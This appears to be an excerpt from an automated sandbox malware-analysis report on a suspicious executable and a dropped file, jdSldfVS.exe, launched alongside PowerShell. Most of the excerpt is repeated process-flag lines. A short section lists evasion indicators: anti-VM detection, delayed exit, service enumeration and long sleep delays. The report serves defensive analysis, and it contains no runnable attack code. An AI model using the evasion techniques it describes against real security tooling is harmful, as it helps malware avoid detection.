                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Delayed program exit found
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040F7A7 Sleep,ExitProcess,17_2_0040F7A7
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: 4490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: 77C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: 87C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: 9980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: 8060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: 9210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory allocated: A210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A748
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6616Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 371Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6564Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 398Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeWindow / User API: threadDelayed 409Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeWindow / User API: threadDelayed 9065Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeAPI coverage: 6.4 %
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 1012Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3532Thread sleep count: 6616 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3532Thread sleep count: 371 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -5534023222112862s >= -30000sJump to behavior
